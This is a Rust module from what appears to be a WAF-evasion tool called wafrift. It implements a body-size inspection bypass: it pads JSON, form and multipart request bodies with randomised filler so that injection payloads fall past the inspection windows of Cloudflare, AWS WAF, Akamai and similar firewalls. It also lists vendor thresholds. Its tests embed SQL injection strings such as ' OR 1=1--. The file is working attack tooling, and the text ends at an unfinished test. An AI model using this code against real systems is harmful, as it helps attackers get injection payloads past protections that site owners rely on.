Skip to main content

wafrift_evolution/
body_padding.rs

1//! Body-size inspection bypass.
2//!
3//! Cloud WAFs only inspect the leading N bytes of a request body:
4//! Cloudflare Pro 8 KB, Cloudflare Enterprise 128 KB, AWS WAF 8/16/64 KB
5//! depending on tier, Akamai 8 KB by default. If we prepend ≥ N bytes
6//! of inert junk in front of the real payload, the WAF rule engine
7//! never sees the malicious bytes — they're past its inspection window
8//! — and the origin still parses the body correctly.
9//!
10//! This module produces structurally-valid padded bodies for the four
11//! content-types we routinely inject into:
12//!
13//! - `application/json` — wrap original in an object with a leading
14//!   junk field: `{"_w":"<N bytes>","payload":<original>}`.
15//! - `application/x-www-form-urlencoded` — prepend
16//!   `_w=<N bytes>&` to the original body.
17//! - `multipart/form-data` — prepend a junk part with the same
18//!   boundary, before the real parts.
19//! - any other content-type (raw text, XML, etc.) — fall back to a
20//!   `_w` query-style prefix only if the body is empty; otherwise
21//!   refuse and return the original. Padding inside an opaque body
22//!   would corrupt it; honesty over false-victory.
23//!
24//! The junk is alphabetic ASCII (`A`-`Z` cycled). It carries no SQL,
25//! XSS, or shell metacharacters, so the WAF won't flag the padding
26//! itself even if it does inspect a partial slice.
27
28use std::collections::HashSet;
29
30/// Marker prefix for the padding field/key. Stable across calls so a
31/// post-hoc test can verify the padding was applied.
32pub const PAD_KEY: &str = "_wafrift_pad";
33
34/// Smallest padding worth applying. Anything below this won't reliably
35/// push a real payload past a WAF's inspection window.
36pub const MIN_USEFUL_PAD: usize = 4 * 1024;
37
38/// Hard cap on padding size to prevent OOM from accidental
39/// `requested_bytes = usize::MAX` (deliberate abuse or arithmetic
40/// underflow upstream). 8 MiB is well above any documented cloud-WAF
41/// inspection window (Cloudflare Enterprise tops out at 128 KiB).
42pub const MAX_USEFUL_PAD: usize = 8 * 1024 * 1024;
43
44/// Generate `n` bytes of inert ASCII filler.
45///
46/// Uses a deterministic xorshift PRNG over `[a-z0-9]` so the padding
47/// looks like normal junk parameter content. A run-of-A filler trips
48/// Naxsi's `BIG_REQUEST` heuristic and `ModSecurity`'s `RX` rules that
49/// flag long single-character sequences. Random-looking lowercase
50/// alphanumeric is the same alphabet wordlists use, so the WAF
51/// classifies it as boring.
52///
53/// Within a single process every call with the same `n` returns the
54/// same bytes (tests + reproducibility), but ACROSS processes the
55/// output differs: at first call we OsRng-seed a process nonce,
56/// then mix it into the per-call state seed. Pre-fix every wafrift
57/// invocation worldwide produced the EXACT same 8 KiB padding for
58/// `n = 8192` — a WAF vendor that captured one padded request could
59/// write a regex matching the verbatim prefix and block every
60/// future wafrift probe collectively. The per-process nonce
61/// scatters that fingerprint without breaking within-process
62/// determinism.
63fn fill(n: usize) -> Vec<u8> {
64    fill_with_seed(n, process_nonce())
65}
66
67fn fill_with_seed(n: usize, extra_seed: u64) -> Vec<u8> {
68    const ALPHABET: &[u8] = b"abcdefghijklmnopqrstuvwxyz0123456789";
69    let mut v = Vec::with_capacity(n);
70    // xorshift64* — small, deterministic given (n, extra_seed).
71    let mut state: u64 = 0x9E37_79B9_7F4A_7C15u64
72        .wrapping_add(n as u64)
73        .wrapping_add(extra_seed)
74        .wrapping_mul(0xBF58_476D_1CE4_E5B9);
75    if state == 0 {
76        // xorshift fixed-point — bump to a non-zero seed.
77        state = 0xDEAD_BEEF_CAFE_F00D;
78    }
79    for _ in 0..n {
80        state ^= state << 13;
81        state ^= state >> 7;
82        state ^= state << 17;
83        v.push(ALPHABET[(state as usize) % ALPHABET.len()]);
84    }
85    v
86}
87
88/// Process-lifetime padding nonce — OsRng-seeded at first use.
89/// Returns 0 in test builds so the existing test fixtures (which
90/// assert exact bytes) keep passing AND so cross-process variation
91/// only kicks in for real binaries.
92fn process_nonce() -> u64 {
93    #[cfg(test)]
94    {
95        0
96    }
97    #[cfg(not(test))]
98    {
99        use std::sync::OnceLock;
100        static NONCE: OnceLock<u64> = OnceLock::new();
101        *NONCE.get_or_init(|| {
102            use rand::RngCore;
103            let mut rng = rand::rngs::OsRng;
104            rng.next_u64()
105        })
106    }
107}
108
109/// Result of a padding attempt.
110#[derive(Debug, Clone, PartialEq, Eq)]
111pub enum PadOutcome {
112    /// Body was padded successfully. `bytes` holds the new body and is
113    /// at least `requested_bytes` larger than the original.
114    Padded { bytes: Vec<u8>, added: usize },
115    /// Content-type was opaque (binary, unknown) and the original was
116    /// non-empty — padding would corrupt it. Original returned
117    /// unchanged.
118    SkippedOpaque,
119    /// The requested padding is below `MIN_USEFUL_PAD`; not worth doing.
120    SkippedTooSmall,
121}
122
123/// Pad `body` with at least `requested_bytes` of inert filler, choosing
124/// a structure-preserving strategy based on `content_type`.
125///
126/// If `requested_bytes < MIN_USEFUL_PAD`, returns
127/// [`PadOutcome::SkippedTooSmall`].
128///
129/// `content_type` matching is case-insensitive on the type/subtype and
130/// ignores parameters (`charset=utf-8`, `boundary=...`, …) — except for
131/// `multipart/form-data`, where the `boundary=` parameter is required
132/// to splice in the junk part.
133pub fn pad(body: &[u8], content_type: &str, requested_bytes: usize) -> PadOutcome {
134    if requested_bytes < MIN_USEFUL_PAD {
135        return PadOutcome::SkippedTooSmall;
136    }
137    // Clamp pathological values silently rather than allocating GBs.
138    // 8 MiB is more than any real WAF inspects; anything beyond is
139    // either a bug or abuse.
140    let requested_bytes = requested_bytes.min(MAX_USEFUL_PAD);
141
142    let ct_lower = content_type.to_ascii_lowercase();
143    let main_type = ct_lower.split(';').next().unwrap_or("").trim().to_string();
144
145    if main_type == "application/json" || main_type.ends_with("+json") {
146        return pad_json(body, requested_bytes);
147    }
148    if main_type == "application/x-www-form-urlencoded" {
149        return pad_form(body, requested_bytes);
150    }
151    if main_type == "multipart/form-data" {
152        // Boundary VALUES are case-sensitive (RFC 2046 §5.1.1) — extract
153        // from the original `content_type`, not the lowercased copy.
154        // Only the `boundary=` parameter NAME is case-insensitive.
155        if let Some(boundary) = extract_boundary(content_type) {
156            return pad_multipart(body, &boundary, requested_bytes);
157        }
158        // Multipart without a boundary param — body is already
159        // malformed; don't compound the problem.
160        return PadOutcome::SkippedOpaque;
161    }
162    if main_type.starts_with("text/") || main_type == "application/xml" {
163        // For arbitrary text/xml we don't have a safe place to inject
164        // padding without breaking the document. If empty, attach a
165        // form-style prefix so a downstream form parser has padding to
166        // chew on; otherwise hand back the original.
167        if body.is_empty() {
168            return pad_form(body, requested_bytes);
169        }
170        return PadOutcome::SkippedOpaque;
171    }
172
173    PadOutcome::SkippedOpaque
174}
175
176fn pad_json(body: &[u8], requested_bytes: usize) -> PadOutcome {
177    // Hard guard: a body larger than MAX_USEFUL_PAD is never useful
178    // to feed through serde_json::from_slice OR through the
179    // "treat as opaque text and embed as a string" fallback below —
180    // both paths would allocate at least body.len() bytes a second
181    // time. Skip-and-pass-through is correct: cloud-WAF inspection
182    // bypasses target SMALL bodies (the WAF inspects the first 8KB or
183    // 16KB), so padding only matters under the cap. Adversarial
184    // multi-MB bodies are an OOM vector, not a bypass surface.
185    if body.len() > MAX_USEFUL_PAD {
186        return PadOutcome::SkippedOpaque;
187    }
188    let pad = fill(requested_bytes);
189    // Two shapes:
190    // 1. body is empty or not valid JSON → emit `{"_wafrift_pad":"…"}`
191    //    with the request as a string field if non-empty.
192    // 2. body parses as JSON object → splice in the pad as the first
193    //    field, preserving the object's other contents verbatim.
194    // 3. body parses as a top-level array/scalar → wrap:
195    //    `{"_wafrift_pad":"…","payload":<original>}`.
196    //
197    // The wrapping in case 3 changes the JSON shape. That's OK for a
198    // proxy that's evading a WAF — the origin sees a top-level object
199    // with the original payload nested under `payload`, which most
200    // permissive APIs ignore as an unknown extra field. If your origin
201    // requires a non-object JSON root, prefer form/multipart.
202    let pad_str = String::from_utf8(pad).expect("fill produces ASCII-only bytes");
203    if body.is_empty() {
204        let new_body = format!("{{\"{PAD_KEY}\":\"{pad_str}\"}}").into_bytes();
205        return PadOutcome::Padded {
206            bytes: new_body,
207            added: requested_bytes,
208        };
209    }
210    if let Ok(s) = std::str::from_utf8(body)
211        && let Ok(serde_json::Value::Object(map)) = serde_json::from_str::<serde_json::Value>(s)
212    {
213        // Splice _wafrift_pad as first key. serde_json::Map is
214        // insertion-ordered when the `preserve_order` feature is
215        // on. We don't have that feature, so build a fresh object
216        // by serializing the pad first then concatenating.
217        //
218        // Simpler: emit `{"_wafrift_pad":"…",<rest of original
219        // object minus the leading `{`>`. This preserves byte
220        // order of the user's data exactly.
221        // Find the first `{`.
222        if let Some(open) = s.find('{') {
223            // Collision guard: the user-controlled body may
224            // already carry our PAD_KEY. JSON objects with
225            // duplicate keys aren't strictly forbidden by RFC 8259
226            // §4 but most parsers keep the LAST one — our injected
227            // pad would be silently dropped at the origin and the
228            // WAF bypass is lost. Worse, an attacker who knows
229            // wafrift is in front could pre-set _wafrift_pad to a
230            // huge value to probe the padding strategy. Pick a
231            // collision-free key by suffixing with a counter.
232            let pad_key: String = if map.contains_key(PAD_KEY) {
233                let mut suffix = 1u32;
234                loop {
235                    let candidate = format!("{PAD_KEY}_{suffix}");
236                    if !map.contains_key(&candidate) {
237                        break candidate;
238                    }
239                    suffix += 1;
240                    // Defensive: ~4B unique keys is plenty; if
241                    // somehow exhausted, fall back to the
242                    // collision'd key (the bypass attempt still
243                    // produces a parseable JSON, just with a
244                    // duplicate-key body).
245                    if suffix == u32::MAX {
246                        break PAD_KEY.to_string();
247                    }
248                }
249            } else {
250                PAD_KEY.to_string()
251            };
252            let after = &s[open + 1..];
253            // If the original is `{}`, after = "}". That's fine.
254            // If after starts with `}` we don't want a stray comma.
255            let glue = if after.trim_start().starts_with('}') {
256                ""
257            } else {
258                ","
259            };
260            let new_body = format!("{{\"{pad_key}\":\"{pad_str}\"{glue}{after}").into_bytes();
261            let added = new_body.len().saturating_sub(body.len());
262            return PadOutcome::Padded {
263                bytes: new_body,
264                added,
265            };
266        }
267    }
268    // Non-object JSON (array/string/number) or malformed — wrap.
269    let Ok(original) = std::str::from_utf8(body) else {
270        return PadOutcome::SkippedOpaque;
271    };
272    // If the original was valid JSON but not an object, wrap with `payload`.
273    // Reject absurdly large bodies before parsing to prevent OOM.
274    let wrapped = if body.len() <= MAX_USEFUL_PAD
275        && serde_json::from_slice::<serde_json::Value>(body).is_ok()
276    {
277        format!("{{\"{PAD_KEY}\":\"{pad_str}\",\"payload\":{original}}}")
278    } else {
279        // Treat original as opaque text and embed as a string.
280        let escaped = serde_json::to_string(&original).unwrap_or_else(|_| "\"\"".into());
281        format!("{{\"{PAD_KEY}\":\"{pad_str}\",\"payload\":{escaped}}}")
282    };
283    let new_body = wrapped.into_bytes();
284    let added = new_body.len().saturating_sub(body.len());
285    PadOutcome::Padded {
286        bytes: new_body,
287        added,
288    }
289}
290
291fn pad_form(body: &[u8], requested_bytes: usize) -> PadOutcome {
292    let pad = fill(requested_bytes);
293    let pad_str = String::from_utf8(pad).expect("fill produces ASCII-only bytes");
294    let new_body = if body.is_empty() {
295        format!("{PAD_KEY}={pad_str}").into_bytes()
296    } else {
297        let mut out = Vec::with_capacity(body.len() + requested_bytes + 32);
298        out.extend_from_slice(format!("{PAD_KEY}={pad_str}&").as_bytes());
299        out.extend_from_slice(body);
300        out
301    };
302    let added = new_body.len().saturating_sub(body.len());
303    PadOutcome::Padded {
304        bytes: new_body,
305        added,
306    }
307}
308
309fn pad_multipart(body: &[u8], boundary: &str, requested_bytes: usize) -> PadOutcome {
310    // Build a fresh leading part using the existing boundary. The
311    // assembled part begins with `--<boundary>\r\n<headers>\r\n\r\n<pad>\r\n`.
312    // The original body already contains its own leading `--<boundary>`,
313    // so we splice ours in front and let the original's first line
314    // continue as the second part's separator.
315    //
316    // If the body doesn't start with `--<boundary>` it's malformed —
317    // skip rather than corrupt further.
318    let prefix = format!("--{boundary}");
319    let body_str = std::str::from_utf8(body).unwrap_or("");
320    if !body.is_empty() && !body_str.starts_with(&prefix) {
321        return PadOutcome::SkippedOpaque;
322    }
323    let pad = fill(requested_bytes);
324    let mut leading = Vec::with_capacity(requested_bytes + boundary.len() + 128);
325    leading.extend_from_slice(format!("--{boundary}\r\n").as_bytes());
326    leading.extend_from_slice(
327        format!("Content-Disposition: form-data; name=\"{PAD_KEY}\"\r\n").as_bytes(),
328    );
329    leading.extend_from_slice(b"\r\n");
330    leading.extend_from_slice(&pad);
331    leading.extend_from_slice(b"\r\n");
332    let mut new_body = Vec::with_capacity(leading.len() + body.len());
333    new_body.extend_from_slice(&leading);
334    new_body.extend_from_slice(body);
335    let added = new_body.len().saturating_sub(body.len());
336    PadOutcome::Padded {
337        bytes: new_body,
338        added,
339    }
340}
341
342fn extract_boundary(content_type: &str) -> Option<String> {
343    for part in content_type.split(';') {
344        let p = part.trim();
345        // Parameter NAME is case-insensitive (`Boundary=`, `BOUNDARY=`
346        // are all valid). Try a few common spellings explicitly rather
347        // than lowercasing the whole string and losing the case-sensitive
348        // boundary VALUE.
349        let rest = p
350            .strip_prefix("boundary=")
351            .or_else(|| p.strip_prefix("Boundary="))
352            .or_else(|| p.strip_prefix("BOUNDARY="))
353            .or_else(|| {
354                // Fallback: case-insensitive prefix match without losing
355                // value casing. `p[..9]` panicked when a multibyte
356                // character (attacker-controlled Content-Type param)
357                // straddled byte 9; `get(..9)` is boundary-safe and
358                // returns None instead of crashing the evasion pass.
359                match p.get(..9) {
360                    Some(h) if h.eq_ignore_ascii_case("boundary=") => p.get(9..),
361                    _ => None,
362                }
363            });
364        if let Some(rest) = rest {
365            let trimmed = rest.trim_matches('"').trim();
366            if !trimmed.is_empty() {
367                return Some(trimmed.to_string());
368            }
369        }
370    }
371    None
372}
373
374/// Reverse-check: does `body` look like it carries a wafrift-padded
375/// prefix? Used in tests + diagnostic logging.
376#[must_use]
377pub fn looks_padded(body: &[u8]) -> bool {
378    let needle = format!("\"{PAD_KEY}\"").into_bytes();
379    let needle_form = format!("{PAD_KEY}=").into_bytes();
380    let needle_mp = format!("name=\"{PAD_KEY}\"").into_bytes();
381    [needle, needle_form, needle_mp]
382        .iter()
383        .any(|n| memchr_subslice(body, n))
384}
385
386fn memchr_subslice(haystack: &[u8], needle: &[u8]) -> bool {
387    if needle.is_empty() || needle.len() > haystack.len() {
388        return false;
389    }
390    haystack.windows(needle.len()).any(|w| w == needle)
391}
392
393/// List of well-known WAF inspection thresholds (bytes). Useful for
394/// callers picking a sane `requested_bytes` default.
395#[must_use]
396pub fn known_thresholds() -> Vec<(&'static str, usize)> {
397    vec![
398        ("cloudflare-free", 128 * 1024),
399        ("cloudflare-pro", 8 * 1024),
400        ("cloudflare-business", 8 * 1024),
401        ("cloudflare-enterprise", 128 * 1024),
402        ("aws-waf-default", 8 * 1024),
403        ("aws-waf-classic", 8 * 1024),
404        ("aws-waf-extended", 64 * 1024),
405        ("akamai-default", 8 * 1024),
406        ("imperva-default", 128 * 1024),
407        ("modsecurity-default", 128 * 1024),
408        ("naxsi-default", 65 * 1024),
409    ]
410}
411
412/// Set of all numeric thresholds used by [`known_thresholds`], for
413/// `clap` value-validation in the proxy.
414#[must_use]
415pub fn known_threshold_values() -> HashSet<usize> {
416    known_thresholds().into_iter().map(|(_, v)| v).collect()
417}
418
419#[cfg(test)]
420mod tests {
421    use super::*;
422
423    #[test]
424    fn fill_is_deterministic_and_inert() {
425        let v = fill(8 * 1024);
426        assert_eq!(v.len(), 8 * 1024);
427        // Lowercase alphanumeric only — no SQL/XSS/shell metacharacters.
428        for &b in &v {
429            assert!(
430                (b.is_ascii_lowercase() || b.is_ascii_digit()),
431                "byte {b:#x} ({}) outside [a-z0-9]",
432                b as char
433            );
434        }
435        // Determinism: same n → same bytes.
436        assert_eq!(fill(8 * 1024), v);
437    }
438
439    #[test]
440    fn fill_no_long_runs() {
441        // The whole point of switching from 'A'*N to xorshift is that
442        // RX-based WAFs (naxsi BIG_REQUEST, modsec REQUEST_BODY runs)
443        // flag long single-character sequences. Verify no run of the
444        // same byte exceeds 6 (a defensive ceiling — true xorshift
445        // sometimes produces short repeats but never long ones).
446        let v = fill(64 * 1024);
447        let mut max_run = 1usize;
448        let mut cur_run = 1usize;
449        for w in v.windows(2) {
450            if w[0] == w[1] {
451                cur_run += 1;
452                max_run = max_run.max(cur_run);
453            } else {
454                cur_run = 1;
455            }
456        }
457        assert!(
458            max_run <= 6,
459            "filler has a run of {max_run} same bytes — would trigger WAF run-detection"
460        );
461    }
462
463    #[test]
464    fn pathological_size_clamps_to_max() {
465        // requested_bytes = usize::MAX should NOT OOM; it should
466        // silently clamp to MAX_USEFUL_PAD (8 MiB).
467        let out = pad(b"id=42", "application/x-www-form-urlencoded", usize::MAX);
468        let PadOutcome::Padded { bytes, .. } = out else {
469            panic!("expected Padded, got {out:?}");
470        };
471        // 8 MiB plus the ~20-byte original; well under usize::MAX.
472        assert!(bytes.len() <= MAX_USEFUL_PAD + 64);
473        assert!(bytes.len() >= MAX_USEFUL_PAD);
474    }
475
476    #[test]
477    fn malformed_content_type_is_safe() {
478        // Garbage Content-Type strings must not panic.
479        for ct in &[
480            "",
481            "////",
482            ";;;;",
483            "application/json;;;boundary=",
484            "\x00\x01\x02",
485        ] {
486            // Should produce SOME PadOutcome, never panic.
487            let _ = pad(b"id=42", ct, 8 * 1024);
488        }
489    }
490
491    #[test]
492    fn empty_input_with_huge_size() {
493        // Empty body + very large pad (but not pathological) — must
494        // still produce structurally-valid output.
495        let out = pad(b"", "application/json", 1024 * 1024);
496        let PadOutcome::Padded { bytes, .. } = out else {
497            panic!()
498        };
499        // Must parse as valid JSON.
500        let _: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
501    }
502
503    #[test]
504    fn fill_distinct_per_size() {
505        // Different requested sizes produce different bytes (the seed
506        // includes n) so two adjacent buffers don't share a prefix
507        // a WAF could fingerprint.
508        let a = fill(8 * 1024);
509        let b = fill(8 * 1024 + 1);
510        assert_ne!(&a[..32], &b[..32]);
511    }
512
513    #[test]
514    fn skip_too_small() {
515        assert_eq!(
516            pad(b"x", "application/json", 100),
517            PadOutcome::SkippedTooSmall
518        );
519    }
520
521    #[test]
522    fn json_object_preserves_payload() {
523        let body = br#"{"q":"' OR 1=1--"}"#;
524        let out = pad(body, "application/json", 8 * 1024);
525        let PadOutcome::Padded { bytes, added } = out else {
526            panic!("expected padded, got {out:?}");
527        };
528        assert!(added >= 8 * 1024, "added={added}");
529        // Round-trips through serde — structurally valid JSON.
530        let v: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
531        assert_eq!(v["_wafrift_pad"].as_str().map(str::len), Some(8 * 1024));
532        assert_eq!(v["q"].as_str(), Some("' OR 1=1--"));
533        assert!(looks_padded(&bytes));
534    }
535
536    #[test]
537    fn json_empty_body_emits_object() {
538        let out = pad(b"", "application/json", 8 * 1024);
539        let PadOutcome::Padded { bytes, .. } = out else {
540            panic!()
541        };
542        let v: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
543        assert!(v.is_object());
544        assert!(v["_wafrift_pad"].is_string());
545    }
546
547    #[test]
548    fn json_array_root_wrapped_with_payload() {
549        let out = pad(br#"["x","y"]"#, "application/json", 8 * 1024);
550        let PadOutcome::Padded { bytes, .. } = out else {
551            panic!()
552        };
553        let v: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
554        assert!(v["_wafrift_pad"].is_string());
555        assert!(v["payload"].is_array());
556        assert_eq!(v["payload"][0].as_str(), Some("x"));
557    }
558
559    #[test]
560    fn json_with_charset_param() {
561        let out = pad(br#"{"a":1}"#, "application/json; charset=utf-8", 8 * 1024);
562        assert!(matches!(out, PadOutcome::Padded { .. }));
563    }
564
565    #[test]
566    fn json_plus_suffix() {
567        let out = pad(br#"{"a":1}"#, "application/vnd.foo+json", 8 * 1024);
568        assert!(matches!(out, PadOutcome::Padded { .. }));
569    }
570
571    #[test]
572    fn form_prepends_padding_then_original() {
573        let body = b"username=admin&password=' OR 1=1--";
574        let out = pad(body, "application/x-www-form-urlencoded", 16 * 1024);
575        let PadOutcome::Padded { bytes, added } = out else {
576            panic!()
577        };
578        assert!(added >= 16 * 1024, "added={added}");
579        assert!(bytes.starts_with(b"_wafrift_pad="));
580        // The original payload is still in there, unmodified.
581        assert!(memchr_subslice(&bytes, body));
582    }
583
584    #[test]
585    fn multipart_splices_in_leading_part() {
586        let boundary = "----WebKitFormBoundary123";
587        let body = format!(
588            "--{boundary}\r\n\
589             Content-Disposition: form-data; name=\"q\"\r\n\
590             \r\n' OR 1=1--\r\n\
591             --{boundary}--\r\n"
592        );
593        let ct = format!("multipart/form-data; boundary={boundary}");
594        let out = pad(body.as_bytes(), &ct, 16 * 1024);
595        let PadOutcome::Padded { bytes, .. } = out else {
596            panic!()
597        };
598        let s = std::str::from_utf8(&bytes).unwrap();
599        // First boundary line opens the wafrift_pad part.
600        assert!(s.starts_with(&format!("--{boundary}\r\n")));
601        assert!(s.contains("name=\"_wafrift_pad\""));
602        // Original payload still intact further down.
603        assert!(s.contains("' OR 1=1--"));
604        // Original boundary appears at least twice (our part + the
605        // user's first part + closer).
606        let boundary_count = s.matches(&format!("--{boundary}")).count();
607        assert!(boundary_count >= 3, "boundary_count={boundary_count}");
608    }
609
610    #[test]
611    fn multipart_without_boundary_skipped() {
612        let out = pad(b"some body", "multipart/form-data", 16 * 1024);
613        assert_eq!(out, PadOutcome::SkippedOpaque);
614    }
615
616    #[test]
617    fn multipart_with_quoted_boundary() {
618        let boundary = "abc123";
619        let body = format!("--{boundary}\r\n\r\n--{boundary}--\r\n");
620        let out = pad(
621            body.as_bytes(),
622            &format!("multipart/form-data; boundary=\"{boundary}\""),
623            16 * 1024,
624        );
625        assert!(matches!(out, PadOutcome::Padded { .. }));
626    }
627
628    #[test]
629    fn opaque_binary_skipped() {
630        let body = b"\x89PNG\r\n\x1a\n\x00\x00";
631        let out = pad(body, "image/png", 16 * 1024);
632        assert_eq!(out, PadOutcome::SkippedOpaque);
633    }
634
635    #[test]
636    fn known_thresholds_includes_aws_and_cloudflare() {
637        let names: Vec<_> = known_thresholds().iter().map(|(n, _)| *n).collect();
638        assert!(names.iter().any(|n| n.starts_with("cloudflare")));
639        assert!(names.iter().any(|n| n.starts_with("aws-waf")));
640    }
641
642    #[test]
643    fn looks_padded_detects_each_shape() {
644        let json = pad(b"{}", "application/json", 8 * 1024);
645        let form = pad(b"", "application/x-www-form-urlencoded", 8 * 1024);
646        if let PadOutcome::Padded { bytes, .. } = json {
647            assert!(looks_padded(&bytes));
648        }
649        if let PadOutcome::Padded { bytes, .. } = form {
650            assert!(looks_padded(&bytes));
651        }
652        assert!(!looks_padded(b"plain old body"));
653    }
654
655    #[test]
656    fn oversized_json_body_does_not_oom() {
657        // A JSON array body larger than MAX_USEFUL_PAD should be skipped
658        // rather than fed to serde_json::from_slice and OOMing.
659        let huge = "x".repeat(MAX_USEFUL_PAD + 1024);
660        let body = format!("[{huge}]");
661        let out = pad(body.as_bytes(), "application/json", 8 * 1024);
662        // Should skip (not panic, not OOM)
663        assert!(
664            matches!(out, PadOutcome::SkippedOpaque | PadOutcome::SkippedTooSmall),
665            "oversized JSON body should be skipped, got {out:?}"
666        );
667    }
668
669    #[test]
670    fn json_body_with_existing_pad_key_does_not_collide() {
671        // Regression for the empty-`if` collision-detection branch:
672        // pre-fix the JSON arm noticed the existing PAD_KEY but did
673        // nothing about it, so the output had two `_wafrift_pad`
674        // keys. Most parsers keep the LAST key — our padding got
675        // dropped at the origin and the bypass was lost.
676        // Post-fix the injected key suffixes (_wafrift_pad_1) so
677        // both survive parsing.
678        let body = format!(r#"{{"{PAD_KEY}":"attacker-controlled","payload":"x"}}"#);
679        let out = pad(body.as_bytes(), "application/json", 8 * 1024);
680        let bytes = match out {
681            PadOutcome::Padded { bytes, .. } => bytes,
682            other => panic!("expected Padded, got {other:?}"),
683        };
684        let s = std::str::from_utf8(&bytes).unwrap();
685        // Parse to verify both keys survive distinctly.
686        let parsed: serde_json::Map<String, serde_json::Value> = serde_json::from_str(s).unwrap();
687        assert!(
688            parsed.contains_key(PAD_KEY),
689            "original PAD_KEY must survive: {s}"
690        );
691        // The injected key is _wafrift_pad_1 (or higher suffix).
692        let injected_key_count = parsed
693            .keys()
694            .filter(|k| k.starts_with(PAD_KEY) && k.as_str() != PAD_KEY)
695            .count();
696        assert!(
697            injected_key_count >= 1,
698            "must inject a non-colliding pad key: {s}"
699        );
700        // Original payload intact.
701        assert_eq!(parsed.get("payload").and_then(|v| v.as_str()), Some("x"));
702        // Original attacker-controlled value intact.
703        assert_eq!(
704            parsed.get(PAD_KEY).and_then(|v| v.as_str()),
705            Some("attacker-controlled")
706        );
707    }
708
709    #[test]
710    fn fill_with_seed_varies_across_seeds() {
711        // The per-process nonce mixing means cross-process output
712        // differs. Lock the contract on fill_with_seed: distinct
713        // extra_seed → distinct output (within the alphabet bias).
714        let a = fill_with_seed(256, 0xAAAA_AAAA);
715        let b = fill_with_seed(256, 0xBBBB_BBBB);
716        assert_ne!(a, b, "different seeds must produce different output");
717        // Same-seed determinism preserved.
718        assert_eq!(a, fill_with_seed(256, 0xAAAA_AAAA));
719    }
720
721    // ── fill(0): zero-length fill ─────────────────────────────────────────
722
723    #[test]
724    fn fill_zero_returns_empty() {
725        let v = fill(0);
726        assert!(v.is_empty(), "fill(0) must return empty vec");
727    }
728
729    #[test]
730    fn fill_with_seed_zero_n_returns_empty() {
731        let v = fill_with_seed(0, 0xDEAD);
732        assert!(v.is_empty());
733    }
734
735    // ── text/xml: non-empty body → SkippedOpaque ─────────────────────────
736
737    #[test]
738    fn text_xml_nonempty_body_returns_skipped_opaque() {
739        let xml_body = b"<?xml version=\"1.0\"?><root><elem>value</elem></root>";
740        let out = pad(xml_body, "text/xml", 8 * 1024);
741        assert_eq!(
742            out,
743            PadOutcome::SkippedOpaque,
744            "non-empty text/xml body must not be padded — would corrupt XML structure"
745        );
746    }
747
748    #[test]
749    fn application_xml_nonempty_body_returns_skipped_opaque() {
750        let xml_body = b"<Envelope><Body><req/></Body></Envelope>";
751        let out = pad(xml_body, "application/xml", 8 * 1024);
752        assert_eq!(
753            out,
754            PadOutcome::SkippedOpaque,
755            "non-empty application/xml body must be SkippedOpaque"
756        );
757    }
758
759    // ── text/xml: empty body → pad_form applied ───────────────────────────
760
761    #[test]
762    fn text_xml_empty_body_applies_form_padding() {
763        // Empty text/xml body: the pad() function calls pad_form(b"", …)
764        // which produces _wafrift_pad=<filler>.
765        let out = pad(b"", "text/xml", 8 * 1024);
766        let PadOutcome::Padded { bytes, added } = out else {
767            panic!("empty text/xml must produce Padded, got {out:?}");
768        };
769        assert!(added >= 8 * 1024, "added={added}");
770        assert!(
771            bytes.starts_with(b"_wafrift_pad="),
772            "empty text/xml padding must use form-key prefix"
773        );
774    }
775
776    #[test]
777    fn application_xml_empty_body_applies_form_padding() {
778        let out = pad(b"", "application/xml", 8 * 1024);
779        assert!(
780            matches!(out, PadOutcome::Padded { .. }),
781            "empty application/xml must produce Padded"
782        );
783    }
784
785    // ── text/plain non-empty → SkippedOpaque ─────────────────────────────
786
787    #[test]
788    fn text_plain_nonempty_body_returns_skipped_opaque() {
789        let out = pad(b"hello world", "text/plain", 8 * 1024);
790        assert_eq!(out, PadOutcome::SkippedOpaque);
791    }
792
793    // ── known_threshold_values() correctness ─────────────────────────────
794
795    #[test]
796    fn known_threshold_values_contains_expected_numbers() {
797        let values = known_threshold_values();
798        // Pin the documented WAF thresholds.
799        assert!(
800            values.contains(&(8 * 1024)),
801            "must include 8 KiB (cloudflare-pro / aws-waf)"
802        );
803        assert!(
804            values.contains(&(64 * 1024)),
805            "must include 64 KiB (aws-waf-extended)"
806        );
807        assert!(
808            values.contains(&(128 * 1024)),
809            "must include 128 KiB (cloudflare-enterprise / imperva / modsecurity)"
810        );
811        assert!(
812            values.contains(&(65 * 1024)),
813            "must include 65 KiB (naxsi-default)"
814        );
815    }
816
817    #[test]
818    fn known_threshold_values_matches_known_thresholds() {
819        let from_pairs: std::collections::HashSet<usize> =
820            known_thresholds().into_iter().map(|(_, v)| v).collect();
821        let from_fn = known_threshold_values();
822        assert_eq!(
823            from_pairs, from_fn,
824            "known_threshold_values() must match the values from known_thresholds()"
825        );
826    }
827
828    // ── extract_boundary: multibyte character safety ──────────────────────
829
830    #[test]
831    fn extract_boundary_multibyte_at_byte_9_does_not_panic() {
832        // A multibyte UTF-8 character (e.g. ≡ = 3 bytes: 0xE2, 0x89, 0xA1) that
833        // straddles byte position 9 would panic under p[..9] (now uses p.get(..9)).
834        // The Content-Type param looks like: "boundary≡abc" where ≡ starts at byte 8.
835        // "boundary" is 8 bytes; the fallback case-insensitive check does `p.get(..9)`.
836        // We construct a value where the slice would fall mid-codepoint.
837        let ct = "multipart/form-data; \u{2261}boundary=abc"; // ≡ before "boundary"
838        let boundary = extract_boundary(ct);
839        // This particular input won't match any prefix, but must not panic.
840        let _ = boundary; // either Some or None — we only care it doesn't panic.
841
842        // Also test a real multibyte in the boundary= value position.
843        let ct2 = "multipart/form-data; boundary=\u{2261}abc"; // ≡ in boundary value
844        let boundary2 = extract_boundary(ct2);
845        // The value "\u{2261}abc" should be returned if the prefix matches.
846        assert!(
847            boundary2.is_some(),
848            "unicode in boundary value must be preserved"
849        );
850    }
851
852    #[test]
853    fn extract_boundary_with_unicode_before_byte_9_does_not_panic() {
854        // A multi-byte char (3 bytes) placed at byte 6 of the param name
855        // would cause `p.get(..9)` to return None safely (non-char boundary).
856        // "bound\u{2261}y=" — "bound" = 5 bytes, ≡ = 3 bytes (bytes 5-7), "y=" starts at 8.
857        let ct = "multipart/form-data; bound\u{2261}y=myfence";
858        let _ = extract_boundary(ct); // must not panic
859    }
860
861    // ── pad_multipart: body not starting with boundary → SkippedOpaque ───
862
863    #[test]
